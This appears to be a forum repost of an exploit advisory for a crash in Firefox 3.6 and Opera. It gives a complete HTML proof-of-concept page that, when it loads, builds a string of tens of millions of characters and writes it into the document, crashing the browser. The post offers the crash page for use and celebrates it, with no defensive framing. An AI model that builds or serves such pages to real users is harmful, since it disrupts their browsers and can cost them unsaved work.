Jump to content
pyth0n3

Mozilla Firefox v3.6 and Opera Long String Crash (0day) Exploit

Recommended Posts

Posted
===============================================================
Mozilla Firefox v3.6 and Opera Long String Crash (0day) Exploit
===============================================================

#Vulnerability
This bug is a typical result when attacker try to write plenitude String in
document.write() function .User interaction is required to
exploit this vulnerability in that the target must visit a malicious
web page.


#Impact
MOzilla Crash


#Proof of concept
copy the code in text file and save as "asheesh.html" and closed all tabs and windows to avoid any lost of data

open in Mozilla Firefox and wait for 15 sec ...... and say Good Bye

Mozilla .......

Per usske phele Mozilla k antim darshan kar le Prem se bolo jai maata di

Mozilla Rest In Piece!!!!!!!!!!!!!!!!!!!!!!!!!!!

========================================================================================================================

asheesh.html
========================================================================================================================


<html>
<title>asheesh kumar mani tripathi</title>
</br>Asheesh kumar Mani Tripathi
<head>

<script>



function asheesh ()
{
var i=24 , anaconda = "XXXX"
for(i=24;i >0 ;--i)
{
anaconda=anaconda+anaconda;
}

document.write(anaconda);



}

</script>
</head>

<body onLoad="asheesh()"></body>
</html>


# ~ - [ [ : Inj3ct0r : ] ]

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...